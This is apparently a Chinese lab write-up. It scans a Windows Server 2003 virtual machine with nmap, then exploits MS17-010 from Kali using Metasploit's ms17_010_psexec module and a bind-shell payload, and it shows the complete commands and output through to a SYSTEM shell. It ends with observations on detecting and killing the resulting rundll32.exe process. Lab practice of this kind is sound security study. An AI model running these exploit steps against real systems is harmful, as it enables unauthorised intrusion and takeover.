使用kali下的msf對windows 2003進行測試

使用kali下的msf對windows 2003進行測試

測試環境：

windows 2003 192.168.145.132

kali: 192.168.145.146

使用kali查看windows2003下開放的端口以及對應端口是否存在漏洞：

nmap --script=vuln 192.168.145.132

root@kali:~# nmap --script=vuln 192.168.145.132

Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-01 23:26 EDT

Nmap scan report for bogon (192.168.145.132)

Host is up (0.0033s latency).

Not shown: 993 closed ports

PORT     STATE SERVICE

21/tcp   open  ftp

|_sslv2-drown:

80/tcp   open  http

|_http-csrf: Couldn't find any CSRF vulnerabilities.

|_http-dombased-xss: Couldn't find any DOM based XSS.

| http-enum:

|_  /robots.txt: Robots file

|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

135/tcp  open  msrpc

139/tcp  open  netbios-ssn

445/tcp  open  microsoft-ds

1025/tcp open  NFS-or-IIS

1027/tcp open  IIS

MAC Address: 00:0C:29:3E:BE:DF (VMware)


Host script results:

| smb-vuln-ms08-067:

|   VULNERABLE:

|   Microsoft Windows system vulnerable to remote code execution (MS08-067)

|     State: VULNERABLE

|     IDs:  CVE:CVE-2008-4250

|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,

|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary

|           code via a crafted RPC request that triggers the overflow during path canonicalization.

|           

|     Disclosure date: 2008-10-23

|     References:

|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250

|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

|_smb-vuln-ms10-054: false

|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND

| smb-vuln-ms17-010:

|   VULNERABLE:

|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)

|     State: VULNERABLE

|     IDs:  CVE:CVE-2017-0143

|     Risk factor: HIGH

|       A critical remote code execution vulnerability exists in Microsoft SMBv1

|        servers (ms17-010).

|           

|     Disclosure date: 2017-03-14

|     References:

|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx


Nmap done: 1 IP address (1 host up) scanned in 150.89 seconds

可以看到，存在ms-08-067、ms17-010漏洞

下面以ms17-010爲例。

啓動msf並獲得了遠程主機權限：msfconsole

msf5 > search ms17-010


Matching Modules

================


   Name                                           Disclosure Date  Rank     Check  Description

   ----                                           ---------------  ----     -----  -----------

   auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution

   auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection

   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

   exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+

   exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

msf5 > use exploit/windows/smb/ms17_010_psexec

msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/shell_bind_tcp

payload => windows/shell_bind_tcp

msf5 exploit(windows/smb/ms17_010_psexec) > set rhosts 192.168.145.132

rhosts => 192.168.145.132

msf5 exploit(windows/smb/ms17_010_psexec) > exploit


[*] 192.168.145.132:445 - Target OS: Windows Server 2003 3790 Service Pack 2

[*] 192.168.145.132:445 - Filling barrel with fish... done

[*] 192.168.145.132:445 - <---------------- | Entering Danger Zone | ---------------->

[*] 192.168.145.132:445 -     [*] Preparing dynamite...

[*] 192.168.145.132:445 -         Trying stick 1 (x64)...Miss

[*] 192.168.145.132:445 -         [*] Trying stick 2 (x86)...Boom!

[*] 192.168.145.132:445 -     [+] Successfully Leaked Transaction!

[*] 192.168.145.132:445 -     [+] Successfully caught Fish-in-a-barrel

[*] 192.168.145.132:445 - <---------------- | Leaving Danger Zone | ---------------->

[*] 192.168.145.132:445 - Reading from CONNECTION struct at: 0x87107010

[*] 192.168.145.132:445 - Built a write-what-where primitive...

[+] 192.168.145.132:445 - Overwrite complete... SYSTEM session obtained!

[*] 192.168.145.132:445 - Selecting native target

[*] 192.168.145.132:445 - Uploading payload... PAPySZMA.exe

[*] 192.168.145.132:445 - Created \PAPySZMA.exe...

[+] 192.168.145.132:445 - Service started successfully...

[*] 192.168.145.132:445 - Deleting \PAPySZMA.exe...

[*] Started bind TCP handler against 192.168.145.132:4444

[*] Command shell session 1 opened (192.168.145.146:40349 -> 192.168.145.132:4444) at 2019-07-02 02:56:09 -0400




C:\WINDOWS\system32>

C:\WINDOWS\system32>ipconfig

ipconfig


Windows IP Configuration



Ethernet adapter ��������:


   Connection-specific DNS Suffix  . : localdomain

   IP Address. . . . . . . . . . . . : 192.168.145.132

   Subnet Mask . . . . . . . . . . . : 255.255.255.0

   Default Gateway . . . . . . . . . : 192.168.145.2

 

查看windows 2003的網絡連接情況，找到連接記錄。

添加登陸用戶，添加成功，但是系統上沒有任何添加的記錄

安全性裏面出現匿名登陸。

查找進程，是rundll32.exe，該進程是一個可以執行DLL文件內的代碼的Microsoft二進制文件。由於此實用程序是Windows操作系統的一部分，因此可以將其用作一種繞過AppLocker規則或軟件限制策略的方法。所以如果系統環境沒有正確的鎖定某些設置，那麼用戶就可以使用這個二進制文件做一些事情，他們也可以編寫自己的DLL，來繞過任何限制或執行惡意的JavaScript代碼：

直接殺死該進程

kali下程序依然可以運行

查看網絡連接狀態，發現PID依然沒有變，但是該進程查找不到了。

 

查看事件管理器裏面，安全性未發現異常，系統發現異常，存在perfomance logs and alerts服務的狀態信息。

重啓windows 2003 ,kali退出

在windows 2003下安裝進程查看工具procexp查看程序，當kali執行程序時，會自動出現rundll32.exe程序以及一個cmd子進程；如果只刪除rundll32.exe的話，則依然可以執行命令，只有把子進程一起刪除，遠程控制段程序才能退出。

 

參考鏈接：https://blog.csdn.net/wy_97/article/details/86665566